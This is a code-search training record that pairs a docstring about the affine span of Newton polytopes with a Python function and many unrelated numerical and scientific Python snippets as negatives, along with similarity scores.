boundary_op_n(d).dic\r\n for u2 in list(l.keys()):\r\n i = 0\r\n for w in list(ve.dic.keys()):\r\n if (w == u2):\r\n M[i,j] = int((l)[u2])\r\n i = i + 1\r\n j = j + 1\r\n return M \r\n else:\r\n if (p == 0):\r\n return np.identity(len(list(self.basis_group_oriented_p_chains(0).dic.keys())))\r\n else:\r\n return False", "def update_p(self, p: float):\n self.p = p\n for k, sequential in self.m_ops.items():\n if sequential[0].is_identity_op():\n sequential[-1].p = p", "def EvaluateLocation(self, p_int, , p_float=..., p_float=..., p_float=..., *args, **kwargs):\n ...", "def _eval_coeff(self, pt):\n val = 1\n for a in self.args:\n val *= a.coeff(pt)\n return val", "def regular(P):\n try:\n cols = P.shape[0]\n ans = np.ones((1, cols))\n # eq = np.matmul(ans, P)\n # s = np.array(np.arange(1, cols + 1))\n eq = np.vstack([P.T - np.identity(cols), ans])\n # va, vec = np.linalg .eig(P)\n results = np.zeros((cols, 1))\n results = np.vstack([results, np.array([1])])\n statetionary = np.linalg.solve(eq.T.dot(eq), eq.T.dot(results)).T\n # print(statetionary)\n # print(np.argwhere(statetionary < 0))\n if len(np.argwhere(statetionary < 0)) > 0:\n return None\n return statetionary\n except Exception as e:\n return None", "def evalComponent(self, x, p):\n if p > 0 and p <= self.n:\n p = str(p)\n y = self[\"off\"] + self[\"lin\"] * x\n self._v1d.assignValues(\n {\"A\": self[\"A\" + p], \"al\": self[\"al\" + p], \"ad\": self[\"ad\" + p], \"mu\": self[\"mu\" + p]})\n y += self._v1d.evaluate(x)\n return y\n else:\n raise(PE.PyAValError(\"No such component (no. \" + str(p) + \")\", where=\"MultiVoigt1d::evalComponent\",\n solution=\"Use value between 1 and \" + str(self.n)))", "def resolves_matrix(self):\n self.P = np.linalg.solve(self.M, self.f)", "def cost_function(H, n_qubits, p, params):\n ini_state=plus_state(n_qubits)\n for i in range(p):\n ini_state=qaoa_step(ini_state,H,n_qubits,params=[params[2*i],params[2*i+1]])\n return ((sparse.spmatrix.getH(ini_state)).dot(H.dot(ini_state))).real, ini_state", "def ap(self, P):\n if P.divides(self.conductor()):\n if (P*P).divides(self.conductor()):\n # It is 0, because the reduction is additive.\n return ZZ(0)\n else:\n # TODO: It is +1 or -1, but I do not yet know how to\n # compute which without using the L-function.\n return '?'\n else:\n return self._S.hecke_matrix(P)[0,0]", "def evaluate_rijP(self, q):\n rP_i = self._parent._parent.bodies[self.body_id_i].evaluate_r(q, element_id=self.element_id, ksi=self.element_ksi)\n\n self.r_P_list[0] = rP_i\n\n # distance vector\n r_ij_P = rP_i - self.rP_j\n\n return r_ij_P", "def evaluate(self) -> int:", "def power(self,p):\r\n\t\t\r\n\t\t# raise to power\r\n\t\tr,o = Li._expand(self,p)\r\n\t\t\r\n\t\treturn Li(r)", "def __evaluate(self, point):\n assert len(point) == len(self.weight)-1\n result = self.weight[0]\n for i in range(0,len(point)):\n result += self.weight[i+1] * point[i]\n return result", "def _eval_coeff(self, pt):\n return sum(a.coeff(pt) for a in self.args)", "def _compute_pTable(self, expand=False, factor=False,\n simplify=False):\n if self._has(\"p\"):\n return\n if not self._has(\"k\"):\n self.kTable(expand=expand, factor=factor, simplify=simplify)\n if not self._has(\"m\"):\n self.multiplicities(expand=expand, factor=factor,\n simplify=simplify)\n p = Array3D(self._.d + 1)\n self._compute_parameters(p, self._.P, self._.m, integral=True,\n name=PARAMETER, sym=SYMBOL)\n self._.p = p\n self.check_handshake()", "def __imul__(self, s):\n val = _hypre.HypreParMatrix___imul__(self, s)\n\n # val.thisown = 0\n return self\n\n\n return val", "def _precompute_xl(self, p: int) -> List[int]:\n res = [1]\n val = 1\n for _ in range(len(self._s)):\n val = (val * self.X) % p\n res.append(val)\n return res", "def regular(P):\n try:\n dim = P.shape[0]\n q = (P - np.eye(dim))\n ones = np.ones(dim)\n q = np.c_[q, ones]\n QTQ = np.dot(q, q.T)\n bQT = np.ones(dim)\n answer = np.linalg.solve(QTQ, bQT)\n if np.all(answer > 0):\n return answer\n else:\n return None\n except Exception as e:\n return None", "def evaluate(self, point):\n result = self.__evaluate(point)\n return -1 if result < 0 else 1", "def _compute_parameters(self, p, P, m, integral=False, name=None,\n sym=None):\n for h in range(self._.d + 1):\n for i in range(self._.d + 1):\n for j in range(self._.d + 1):\n p[h, i, j] = full_simplify(\n sum(m[t] * P[t, h] * P[t, i] * P[t, j]\n for t in range(self._.d + 1))\n / (self._.n * P[0, h]))\n self._check_parameter(h, i, j, p[h, i, j],\n integral=integral,\n name=name, sym=sym)\n self._check_consistency(p, P[0], name=name, sym=sym)", "def EvaluatePosition(self, , p_float=..., p_float=..., p_float=..., *args, **kwargs):\n ...", "def solve_ilp(self):\n\n ilp_solution = pylp.Solution()\n self.ilp_solver.set_constraints(self.constraints)\n message = self.ilp_solver.solve(ilp_solution)\n print(\"ILP solved with minimal value \" + str(ilp_solution.get_value()) + \" and status \" + message)\n\n solution = lil_matrix(self.graph.shape)\n for i in range(self.num_variables):\n print(\"value of var \" + str(i) + \" is \" + str(ilp_solution.get_vector()[i]))\n if ilp_solution.get_vector()[i] < 0.5:\n continue\n (u,v) = self.var_to_edge[i]\n solution[u,v] = self.graph[u,v] - self.min_cost + 1\n\n return solution", "def Eval(self, r, ppar, pperp, v, gamma=None, p2=None, p=None, xi=None):\n while False:\n yield None", "def a_ij(s, p, i=1, j=1): # (Validated)\n from math import sqrt\n if i == j:\n return s.c[i]['a'] # Return pure paramater\n else: # find mixture aij i =/= j\n return (1 - p.m['k'][i][j]) * sqrt(s.c[i]['a'] * s.c[j]['a'])", "def I(x, y, l, p):\n \n return 0.5 / (mu * c) * A0**2 * ( u(x, y, l, p) )**2", "def success_p(self, input_p = None):\r\n if input_p is None:\r\n input_p = uniform_p(self.n_inputs())\r\n return np.trace(np.dot(np.diag(input_p), self.matrix))", "def compute_demand(self, p):\n \n G, h = spdiag([-1.0]*self.n), matrix(0.0, (self.n, 1))\n \n if self.type == 'quad':\n Q, r = self.data\n return solvers.qp(-Q, p-r, G, h)['x']\n\n if self.type == 'sqrt':\n def F(x=None, z=None):\n if x is None: return 0, matrix(1.0, (self.n, 1))\n u, Du, H = self.utility(x)\n f, Df = p.T*x - u, p.T - Du\n if z is None: return f, Df\n return f, Df, -z[0]*H\n return solvers.cp(F, G, h)['x']", "def mod_inv(a,p):\r\n\r\n for i in range(1,p):\r\n if (i*a)%p==1: return i\r\n raise ValueError(str(a)+\" has no inverse mod \"+str(p))", "def cost_matrix(x, y, p=2):\n xc = tf.expand_dims(x, 1)\n yr = tf.expand_dims(y, 0)\n d = tf.math.pow(tf.abs(xc - yr), p)\n return tf.reduce_sum(d, axis=-1)", "def compute_PSSM_self_information(p):\n return -sp.sum(p*sp.log(p))", "def _model(x, p):\n y_hat = 0\n for i, pi in enumerate(reversed(p)):\n y_hat += x**i * pi\n return y_hat", "def ij(ij, pol, ant) :\n s.ij(pol, ij, ant)", "def laplacian(self, p):\n wf = self._wf(p)\n return - G * self.d * wf.sum()", "def eval_function_modlin(point, level_vector, index_vector):\n\n product = 1\n for (l, i, x) in izip(level_vector, index_vector, point):\n if l == 1 and i == 1:\n val = 1\n elif l > 1 and i == 1:\n if x >= 0 and x <= 2 ** (1 - l):\n val = 2 - 2 ** l * x\n else:\n val = 0\n elif l > 1 and i == 2 ** l - 1:\n if x >= 1 - 2 ** (1 - l) and x <= 1:\n val = 2 ** l * x + 1 - i\n else:\n val = 0\n else:\n val = __phi(x * 2 ** l - i)\n product *= val\n if product == 0:\n break\n return product", "def expression(self, p):\n num_type, first, second = get_type_first_second_of_binary_operation(p.expression, p.term)\n\n opcode_type = I_for_int_R_for_float(num_type)\n opcode_action = \"ADD\" if p.ADDOP == \"+\" else \"SUB\"\n opcode = opcode_type + opcode_action\n\n temp = next(g_generate_temp_variable_name)\n temp_variables_values_dict[temp] = temp\n\n qaud_code(f\"{opcode} {temp} {first} {second}\")\n return Expression(num_type, temp)", "def m_p(Z0, P0, P):\n return m(Z0) * P/P0", "def eval(f, a, j=0):\n return f.per(dmp_eval_in(f.rep, f.dom.convert(a), j, f.lev, f.dom), lower=True)", "def p(self):\n self.pTable()", "def algorithm_1_2(p, c, x):\n\n q = np.array(c, dtype=np.float64)\n\n for k in range(1, p + 1):\n for j in range(0, p - k + 1):\n q[j] = (1 - x) * q[j] + x * q[j + 1]\n return q[0]", "def _evaluate_recur(self, p):\n if self.is_leaf(p):\n return float(p.element()) # we assume element is numeric\n else:\n op = p.element()\n left_val = self._evaluate_recur(self.left(p))\n right_val = self._evaluate_recur(self.right(p))\n if op == '+':\n return left_val + right_val\n elif op == '-':\n return left_val - right_val\n elif op == '/':\n return left_val / right_val\n else:\n return left_val * right_val # treat 'x' or '*' as multiplication", "def _evaluate(self, x):\n raise NotImplementedError()", "def perplexity(self):\n raise NotImplementedError(\"To be implemented\")", "def _pfunc(i,j,perm):\n if perm[i-1] == j:\n return 1\n else:\n return 0", "def P(self):\n self.eigenmatrix()", "def return_policy_evaluation(self, p, u, r, T, gamma):\n for s in range(0, self.env.observation_space.n):\n if not np.isnan(p[s]):\n v = np.zeros((1, self.env.observation_space.n), dtype=float)\n v[0, s] = 1.0\n action = int(p[s])\n u[s] = r[s] + gamma * np.sum(np.multiply(u, np.dot(v, T[:, :, action])))\n return u", "def polyeval(self, x):\n return NotImplemented", "def _evaluate_recur(self, p):\n if self.is_leaf(p):\n return float(p.element()) # we assume element is numeric\n else:\n op = p.element()\n left_val = self._evaluate_recur(self.left(p))\n right_val = self._evaluate_recur(self.right(p))\n if op == '+':\n return left_val + right_val\n elif op == '-':\n return left_val - right_val\n elif op == '/':\n return left_val / right_val\n else: # treat 'x' or '*' as multiplication\n return left_val * right_val", "def apply(self, point):\r\n return self*point", "def evaluate(self, p: Posting) -> Union[str, None]:\n return self.eval_fn(p)", "def _get_Pij(self): \n \n with tf.name_scope(\"getting_Pij\"):\n \n n_splits = int(self.dim_input / self.per_split_feats)\n n_divisible = n_splits * self.per_split_feats\n X_split = tf.split(self.X_transformed[:,0:n_divisible], n_splits, axis=1)\n X_split.append(self.X_transformed[:,n_divisible:])\n \n # get norm along first feature set\n normAX = X_split[0][None, :, :] - X_split[0][:, None, :]\n normAX = tf.reduce_sum(normAX ** 2, axis=2)\n \n for split in range(1, len(X_split)): \n \n # Expand dims of AX to [n_samples, n_samples, n_features], where\n # each \"channel\" in the third dimension is the difference between\n # one sample and all other samples along one feature\n norm_thisFeatureSet = X_split[split][None, :, :] - \\\n X_split[split][:, None, :]\n \n norm_thisFeatureSet = tf.reduce_sum(norm_thisFeatureSet ** 2, axis=2)\n \n # add to existing cumulative sum \n normAX = normAX + norm_thisFeatureSet\n \n # Calculate Pij, the probability that j will be chosen \n # as i's neighbor, for all i's. Pij has shape\n # [n_samples, n_samples] and ** is NOT symmetrical **.\n # Because the data is normalized using softmax, values\n # add to 1 in rows, that is i (central patients) are\n # represented in rows\n denomSum = tf.reduce_sum(tf.exp(-normAX), axis=0)\n epsilon = 1e-50\n denomSum = denomSum + epsilon \n \n self.Pij = tf.exp(-normAX) / denomSum[:, None]", "def p0(self, p0):\n u = self.p0 - self.p1\n v = p0 - self.p1\n scale, rM = self.scale_rot_matrix(u, v)\n self.c = self.p1 + rM @ (self.c - self.p1)\n self.r *= scale\n self.r2 = self.r * self.r\n dp = p0 - self.c\n self.a0 = atan2(dp.y, dp.x)", "def _re(self, p):\n return self.edges[:, 0, :] - p # 0 is arbitrary - the other end also works", "def evaluate_cost(\n self, x: Dict[str, ArrayType], p: Dict[str, ArrayType]\n ) -> CasADiArrayType:\n x = self.opt.decision_variables.dict2vec(x)\n p = self.opt.parameters.dict2vec(p)\n return self.opt.f(x, p)", "def pe_solver(Aij, Bij, pi):\n # =========================================================================\n # Calculating the pressure at row i + 1\n # =========================================================================\n return np.dot(np.linalg.inv(Aij), np.dot(Bij, pi))", "def flipy(self, p):\n return int(p.x), int(-p.y+self.h)", "def inv(P):\n L = cho_factor(P)\n return cho_solve(L, np.eye(P.shape[0]))", "def EvaluateFunction(self, p_float=..., p_float=..., p_float=...):\n ...", "def evaluate(self, state):\n abstract", "def f(t,x,p,q):\n return p[1] + q[0]*x", "def __call__(self, xi, p=None):\n\n # print('basis function is called {0}, {1}'.format(xi, p))\n\n return self.__basis(xi, self.p if p is None else p)", "def __pow__(self, power):\n if type(power) is not int:\n return NotImplemented\n if not self.isSquare():\n raise ValueError(\"Power invalid for non-square matrices\")\n if power > 0:\n p = power\n returnvalue = Matrix(self)\n elif power < 0:\n p = -power\n returnvalue = self.inverse()\n elif power == 0:\n return NotImplemented\n for i in range(p - 1):\n returnvalue *= returnvalue\n return returnvalue", "def mat24_perm_to_int(p):\n oct = sum(1 << x for x in p[:8])\n res = gc.vect_to_octad(oct) \n #print(\"p2i oct\", hex(oct))\n res -= STD_OCTAD\n res += (res >> 12) & 759 \n #print(\"p2i\", res)\n p1 = [24]*32\n oct, j = 8 * oct, 0x00 \n for i in range(24):\n o = oct & 8\n p1[i] = (j >> o) & 0x1f\n j += 1 << o\n oct >>= 1\n q, q_inv = [None]*8, [None]*8\n for i in range(8):\n j = p1[p[i] & 0x1f] & 7\n q[j] = i\n q_inv[i] = j\n for i in range(6):\n # exchange place i with place q_inv[i]\n j = q_inv[i]\n #q_inv[q[i]], q_inv[q[j]] = q_inv[q[j]], q_inv[q[i]]\n #q[i], q[j] = q[j], q[i]\n #assert q[:i] == q_inv[:i] == lrange(i)\n q_inv[q[i]] = q_inv[q[j]]\n q[j] = q[i]\n #print(\"p2i%d\" % i, j-i) \n res = res * (8 - i) + j - i\n #print(\"p2ifinal\", p1[p[8] & 0x1f]) \n return 16 * res + p1[p[8] & 0x1f]", "def computeSPPMI_matrix(P, shifted_k: int, check_sym = True):\n a, b = P.shape\n # print P.shape, type(P)\n P = np.asarray(P)\n # print 'Shape of P: ', P.shape\n assert a == b\n D = np.sum(P)\n cols = np.sum(P, axis = 0) # sum the columns (b,)\n rows = np.sum(P, axis = 1, keepdims=True) # sum the row (a,1)\n P = P / (cols + 1e-10)\n P = P / (rows + 1e-10)\n P = P * D\n PMI = np.log(P + 1e-10)\n S = PMI - np.log(shifted_k)\n mask = S > 0\n SPPMI = np.multiply(S, mask)\n assert np.min(SPPMI) == 0\n if check_sym: np.fill_diagonal(SPPMI, 0) # in-place operation\n assert torch_utils.check_symmetric(SPPMI) == True\n return SPPMI", "def p2f (p):\n #return 11000**((p+1)/2)\n #return (p+1)*11000\n return (p+1)*5500", "def __init__ (self, p, q):\n self.n = p * q\n self.n_sq = self.n * self.n\n self.g = self.n + 1", "def evaluate( self, x ) :\n\n P = 0.\n for c_l in reversed( self.coefficients ) : P = c_l + x * P\n return( P )", "def apply_pt(self, x_pt, y_pt):\n return ( self.matrix[0][0]*x_pt + self.matrix[0][1]*y_pt + self.vector[0],\n self.matrix[1][0]*x_pt + self.matrix[1][1]*y_pt + self.vector[1] )", "def normIP(p):\n z = normIQ(1.0 - p)\n return z + (p - normP(z)) / normZ(z)", "def evaluationFunction(self, currentGameState, action):\n successorGameState = currentGameState.generatePacmanSuccessor(action)\n return scoreEvaluationFunction(successorGameState)", "def test_indexed_increment(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=2., mode='indexed').base\n fa = a.function\n fa.data[1:, 1:] = 0\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def _P(m):\n P = np.zeros((m**2,m**2), dtype=np.int64)\n for i in range(1, m**2 + 1):\n j = 1 + m*((i - 1) % m) + (i - 1)//m\n P[i-1, j-1] = 1\n return P", "def __call__(self, t=1 / 2):\n return (t * self.vector)(self.p1)", "def _phi_int(self, x, d, p):\n ks = np.arange(self.p + 1)\n ks = ks[np.where(2 * (self.p - ks) - d >= 0)][:, np.newaxis]\n return np.sum(\n binom(self.p, ks)\n * (-1) ** ks\n * x[np.newaxis, :] ** (2 * (self.p - ks) - d + 1)\n * perm(2 * (self.p - ks), d)\n / (2 * (self.p - ks) - d + 1),\n axis=0,\n )", "def _query(self, p, k):\n if isinstance(p, int):\n if k >= len(self._table[p]):\n return None\n return self._table[p][k]\n\n # if k > self._tree.depth(p):\n if k >= len(self._table[p.index()]):\n return None\n return self._table[p.index()][k]", "def _pij(i: int, j: int):\n ia = i * 2 + 0\n ib = i * 2 + 1\n ja = j * 2 + 0\n jb = j * 2 + 1\n term1 = FermionOperator(((ja, 0), (ib, 0)), 1.0)\n term2 = FermionOperator(((ia, 0), (jb, 0)), 1.0)\n return numpy.sqrt(0.5) * (term1 + term2)", "def moment(self, p, q):\n\n def combin(n, r):\n # compute number of combinations of size r from set n\n def prod(values):\n try:\n return reduce(lambda x, y: x * y, values)\n except TypeError:\n return 1\n\n return prod(range(n - r + 1, n + 1)) / prod(range(1, r + 1))\n\n vertices = self.vertices(closed=True)\n x = vertices[0, :]\n y = vertices[1, :]\n\n m = 0.0\n n = len(x)\n for l in range(n):\n l1 = (l - 1) % n\n dxl = x[l] - x[l1]\n dyl = y[l] - y[l1]\n Al = x[l] * dyl - y[l] * dxl\n \n s = 0.0\n for i in range(p + 1):\n for j in range(q + 1):\n s += (-1)**(i + j) \\\n * combin(p, i) \\\n * combin(q, j) / ( i+ j + 1) \\\n * x[l]**(p - i) * y[l]**(q - j) \\\n * dxl**i * dyl**j\n m += Al * s\n\n return m / (p + q + 2)", "def _renorm_p(self, p):\n return np.sign(p)*np.sqrt(np.sqrt(np.abs(p)))", "def optimizer_array(self, p):\n f = None\n if self.has_parent() and self.constraints[__fixed__].size != 0:\n f = np.ones(self.size).astype(bool)\n f[self.constraints[__fixed__]] = FIXED\n elif self._has_fixes():\n f = self._fixes_\n if f is None:\n self.param_array.flat = p\n [np.put(self.param_array, ind, c.f(self.param_array.flat[ind]))\n #py3 fix\n #for c, ind in self.constraints.iteritems() if c != __fixed__]\n for c, ind in self.constraints.items() if c != __fixed__]\n else:\n self.param_array.flat[f] = p\n [np.put(self.param_array, ind[f[ind]], c.f(self.param_array.flat[ind[f[ind]]]))\n #py3 fix\n #for c, ind in self.constraints.iteritems() if c != __fixed__]\n for c, ind in self.constraints.items() if c != __fixed__]\n #self._highest_parent_.tie.propagate_val()\n\n self._optimizer_copy_transformed = False\n self.trigger_update()", "def gini_scorer(a,p):\n\n return gini_normalized(a,p[:,1])", "def square_func(i, T, amp, p = 10000):\n if (i//p)%2 == 0:\n return T + amp\n else:\n return T - amp", "def polyval(p, x):\r\n val = 0\r\n ii = len(p) - 1\r\n for i in range(len(p) - 1):\r\n val += p[i] * (x ** ii)\r\n ii -= 1\r\n return val + p[-1]", "def fun_lorentzian(p,r):\n return p[1] / ((r/p[0])**2 + 1)", "def pvector_pp(i, q):\n\tc0 = coords_cut[i]\n\tra, dec = c0.ra.value, c0.dec.value\n\tr = hp.rotator.Rotator([ra, dec, 0])\n\tsT = np.matmul(r.mat, np.matmul(s_tensor_cut[:,:,i], r.mat.transpose()))\n\tevals, evecs = np.linalg.eigh(sT[1:,1:])\n\tevecA, evecB = evecs[:,0], evecs[:,1]\n\tif evecB[0] < 0:\n\t\tevecB = -evecB\n\ttheta = np.arctan2(evecB[1], evecB[0])\n\tres = 180*theta.item()/np.pi, i\n\tq.put(res)\n\treturn res", "def _xphi_int(self, x, d, p):\n ks = np.arange(self.p + 1)\n ks = ks[np.where(2 * (self.p - ks) - d >= 0)][:, np.newaxis]\n return np.sum(\n binom(self.p, ks)\n * (-1) ** ks\n * x[np.newaxis, :] ** (2 * (self.p - ks) - d + 2)\n * perm(2 * (self.p - ks), d)\n / (2 * (self.p - ks) - d + 2),\n axis=0,\n )", "def p_m(pmx_c,px):\n pm = np.zeros(pmx_c.shape[0])\n for mi in range(pm.size):\n for xi in range(px.size):\n pm[mi] += pmx_c[mi,xi]*px[xi]\n return pm", "def solution(n,p):\n \n a=pow(n, (p - 1) // 2, p)\n if(a==1):\n return True\n else :\n return False", "def p1(self, p1):\n p0 = self.p0\n u = self.p1 - p0\n v = p1 - p0\n\n scale, rM = self.scale_rot_matrix(u, v)\n self.c = p0 + rM @ (self.c - p0)\n self.r *= scale\n self.r2 = self.r * self.r\n dp = p0 - self.c\n self.a0 = atan2(dp.y, dp.x)", "def prim_method(self):", "def prim_method(self):", "def _init_eigenmatrix(self, P):\n self._.d = nrows(P) - 1\n assert all(len(r) == self._.d + 1 for r in P), \\\n \"parameter length mismatch\"\n P = Matrix(SR, P)\n for i, x in enumerate(P[0]):\n P[0, i] = integralize(x)\n self._.n = sum(P[0])\n return P", "def get_abscissa(self, p):\n return np.dot(p - self.zero, self.direction)", "def P_i(self, alpha, Q, X_data):\n X_lin_comb = np.dot(alpha, X_data)\n Pi = Q * np.exp(X_lin_comb - X_lin_comb.max(initial=0))\n Pi = Pi / Pi.sum()\n return Pi", "def evaluatePolicy_SolvingSystemOfLinearEqs(self, policy):\n\n V = np.zeros(self.nStates)\n # loop\n for state in range(self.nStates):\n # value to 0\n v = 0\n action = np.argmax(policy[:, state])\n for next_state, prob in enumerate(self.T[action][state]):\n v += prob * (self.R[action][state] + self.discount * V[next_state])\n V[state] = v\n return V", "def eval_prior(self, state, action):\n\n return np.dot(state, self.a.T) + np.dot(action, self.b.T)", "def _evaluate(self, x, return_indices=False):\n return self._evalOrDer(x, True, False)[0]", "def _evaluate(self, index):\n raise NotImplementedError", "def set_expansion_steps(self, p):\n p = int(p)\n if p <= 0:\n raise ValueError(\n 'Integer must be greater than zero (to limit the interval size'\n ' to (2 ** integer) * width).')\n self._p = p", "def algorithm_1_1(p, c, t, x):\n\n q = np.array(c, dtype=np.float64)\n\n for k in range(1, p + 1):\n for j in range(0, p - k + 1):\n q[j] = (t[j + k] - x) / (t[j + k] - t[j]) * q[j] + (x - t[j]) / (\n t[j + k] - t[j]) * q[j + 1]\n return q[0]" ]
[ "0.6590414", "0.64902985", "0.5803352", "0.576456", "0.56841123", "0.56735307", "0.5545928", "0.54923505", "0.54681116", "0.5413606", "0.5399578", "0.5339681", "0.5316676", "0.53084254", "0.5288867", "0.525981", "0.52447516", "0.5244498", "0.5217221", "0.521235", "0.5206362", "0.5195178", "0.51789606", "0.51632947", "0.5100213", "0.5087714", "0.5081258", "0.5078931", "0.5053198", "0.5036393", "0.5028569", "0.5026325", "0.5006044", "0.50043327", "0.50035065", "0.49929", "0.4988843", "0.49867758", "0.4965937", "0.4960121", "0.49469024", "0.49428186", "0.49421504", "0.49393705", "0.49109876", "0.49095565", "0.49022937", "0.48998582", "0.48952553", "0.48780093", "0.48776975", "0.48700348", "0.48700204", "0.486586", "0.48640615", "0.48609558", "0.48577482", "0.48563483", "0.48547348", "0.48444352", "0.48281825", "0.48280936", "0.48252603", "0.48018655", "0.47849703", "0.47845882", "0.4782678", "0.47798303", "0.4769205", "0.47675377", "0.4761075", "0.47494498", "0.47493553", "0.4743193", "0.47419637", "0.47397158", "0.47369513", "0.47263083", "0.47255614", "0.4724568", "0.47204784", "0.47195882", "0.47183186", "0.47121957", "0.47072968", "0.47068492", "0.47050366", "0.47007012", "0.46976492", "0.4692514", "0.4692514", "0.46919358", "0.4689712", "0.46852478", "0.46752906", "0.4671883", "0.46674138", "0.4664621", "0.46615413", "0.46550694" ]
0.6615458
0
r""" Return the dimension of the affine space spanned generated by each Newton polytopes. for triangular matrices, seems to stay 0 on the diagonal.
def get_vector_span(self, i, j): from sage.rings.infinity import Infinity from sage.matrix.constructor import matrix data = self[i,j] if not data: return None elif len(data) == 1: return FreeModule(ZZ, self._nvars).submodule([]) else: return matrix([x-data[0] for x in data]).row_space()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dim(self) -> int:", "def getlen(self):\n if self.onlydiag():\n return self.lendiag()\n else:\n return len(self)", "def dimension(self):\n return 3*self.genus - 3 + self.n", "def dim(self) -> int:\n return self.atoms.shape[:-1]", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def diagonal_size(self):\n b = self.GetBounds()\n return np.sqrt((b[1] - b[0]) ** 2 + (b[3] - b[2]) ** 2)", "def n_dim(self):\n return self._n_dim", "def shape(self) -> (int,int):\n return (len(self.mat), len(self.mat[0]))", "def matrix_dim(CT):\r\n if CT[0]==0 and CT[-1]==0:\r\n return 2\r\n elif CT[0]!=0 and CT[-1]!=0:\r\n return 4", "def __len__(self):\n return np.size(self.A,0)", "def Nx(self):\n return self.shape[-1]", "def dim(self) -> int:\n pass", "def __len__(self):\n return self.N.shape[0]", "def dimensionality(self):\n return int(self.nDims)", "def nplex(self):\n return self.shape[1]", "def dim(self):\n return self.m, self.n", "def my_dimension(self) -> Nat:\n my_part = self.my_diagram.as_list()\n sum_phat_sq = sum((z*(2*i+1) for (i, z) in enumerate(my_part)))\n dimension = 0\n num_odd_parts = sum((z % 2 for z in my_part))\n if self.my_type is LieType.A:\n dimension = (self.lie_rank+1)**2 - sum_phat_sq\n elif self.my_type is LieType.D:\n dimension = 2*(self.lie_rank**2) - self.lie_rank - \\\n sum_phat_sq//2 + num_odd_parts//2\n elif self.my_type is LieType.B:\n dimension = 2*(self.lie_rank**2) + self.lie_rank - \\\n sum_phat_sq//2 + num_odd_parts//2\n elif self.my_type is LieType.C:\n dimension = 2*(self.lie_rank**2) + self.lie_rank - \\\n sum_phat_sq//2 - num_odd_parts//2\n else:\n raise ValueError(\n \"Lie type must be one of the 4 classical families\")\n return dimension", "def size(adj_mat):\n return adj_mat.shape[0]", "def n_thres(self):\n return np.size(self.thres)", "def number_of_basis(self):\n return self._pre_kernel.shape[0]", "def get_zdim(self):\n return self.decoder.get_input_info_dict()['latent_vector'].get_shape()[1]", "def nNx(self):\n return self.nCx + 1", "def InferSpatialDimension(self):\n\n assert self.points is not None\n # if self.points.shape[1] == 3:\n # if self.element_type == \"tri\" or self.element_type == \"quad\":\n # print(\"3D surface mesh of \", self.element_type)\n\n return self.points.shape[1]", "def size(self)->int:\n\n return np.prod([axes if is_integer(axes) else len(axes) for axes in self._dim_axes])", "def dimensionality(self):\n if self.vector.shape is ():\n return 0\n if len(self.vector.shape) is 1:\n return 1\n _, dim = self.vector.shape\n return dim", "def dim(self):\n return len(self.shape)", "def dim(self):\n return len(self.shape)", "def nspatials(self):\n return int(len(self)/2)", "def numel(self):\n return self.t.size", "def dims(x):\n return len(x.shape)", "def element_size(self):\n vecs = (\n self.nodes[self.elements[:, :4], :][:, 1:, :]\n - self.nodes[self.elements[:, :4], :][:, 0, None, :]\n )\n return np.abs(np.linalg.det(vecs)) / 6", "def dim(self):\n return len(self._n)", "def flat_dim(self):\n return np.sum([c.flat_dim for c in self.spaces])", "def nNy(self):\n if self.dim < 2:\n return None\n return self.nCy + 1", "def ndims(x):\n return len(x.get_shape())", "def dim(self) -> int:\n return self._n_dim", "def size(self):\n return int(misc.intprod(self.shape))", "def dim(self):\n return self.ambient_dim() - self.n_equations()", "def getdim(self):\n return round(self.w() / self.c)", "def columns(self) -> int:\n return self.__squares[0].__len__()", "def n_dims(self):\n return self.pdm.n_dims", "def dimension(self):\n return self.__N", "def __len__(self):\n return self.n_node.shape[0]", "def __len__(self) -> int:\n\n return self.layout.gaDims", "def getNpol(self):\n return self.shape(squeeze=False)[1]", "def calculate_dimensions(self):\n x_coordinates = np.sort(self.grid['x'][:, 0]) # first x node\n self.nr_nodes_z = np.where(x_coordinates == x_coordinates[0])[0].size\n self.nr_elements_x = self.elements.shape[0] / (self.nr_nodes_z - 1)\n self.nr_nodes_x = self.nr_elements_x + 1\n self.nr_elements_z = self.nr_nodes_z - 1", "def get_grid_width(puzzle: str) -> int:\r\n return int(len(puzzle) ** (1 / 2))", "def get_in_dim(self) -> int:\n return self.in_dim", "def dim(self):\n if '_dim' in self.__dict__:\n return self._dim\n\n if len(self._Vrepresentation)==0:\n self._dim = -1\n return self._dim\n\n origin = vector(self._Vrepresentation[0])\n v_list = [ vector(v)-origin for v in self._Vrepresentation ]\n self._dim = matrix(v_list).rank()\n return self._dim", "def dim(self) -> tuple:\n if self.has_tensor(): return self.as_tensor().dim()\n else:\n return tuple(list(self[0].dim()[0]) + [len(self)]), self[0].dim()[1]", "def get_dims(self):\n row_lbl, col_lbl = self.get_idxvals()\n return len(row_lbl), len(col_lbl)", "def size(self):\r\n # Anthony stage 2\r\n return number_size(self.n) - 1", "def n_dims(self):\n return len(self.dimensions)", "def __len__(self):\n return self.flatten_dim(self.shape[0])", "def size(self):\n\t\treturn self.dims", "def nvar(self):\n return self.h.shape[0]", "def nD(self):\n return self.locations[0].shape[0]", "def __len__(self):\n return self.xyz.shape[0]", "def __len__(self):\n return self.xyz.shape[0]", "def N(self):\n return _hypre.HypreParMatrix_N(self)", "def xdim(self):\n return len(self._x)", "def nNz(self):\n if self.dim < 3:\n return None\n return self.nCz + 1", "def dimensions():", "def width(self):\n return self.board.shape[1]", "def outdim(self):\n return len(self.getSensors())", "def width(self) -> int:\n return self._obj[self.x_dim].size", "def dim(self) -> Tuple[Tuple[int, int], Tuple[int, int]]:", "def _get_parameter_count(self):\n parameters_d = 5;\n size_h = self.model.size_h\n return (size_h - 1) + size_h * (\n (size_h - 1) + parameters_d + (self.model.size_aa - 1) + \n (self.model.size_ss - 1) + (self.model.size_cis - 1)\n )", "def __len__(self) -> int:\n\n return self.shape.shape[1]", "def inertia(mus):\n pos, negs, zeros = cluster_eignvalues(mus)\n\n return len(zeros) + min(len(pos), len(negs))", "def dim_M(self):\n assert 'M' in self.dp\n return np.sqrt(self.f1*self.f2*self.f3**3)*self.dT**2*self.dp.M", "def n_dims(self):\n return self.model.template_instance.n_dims", "def dimension(self):", "def numpoints(self):\n return len(self.pars) + 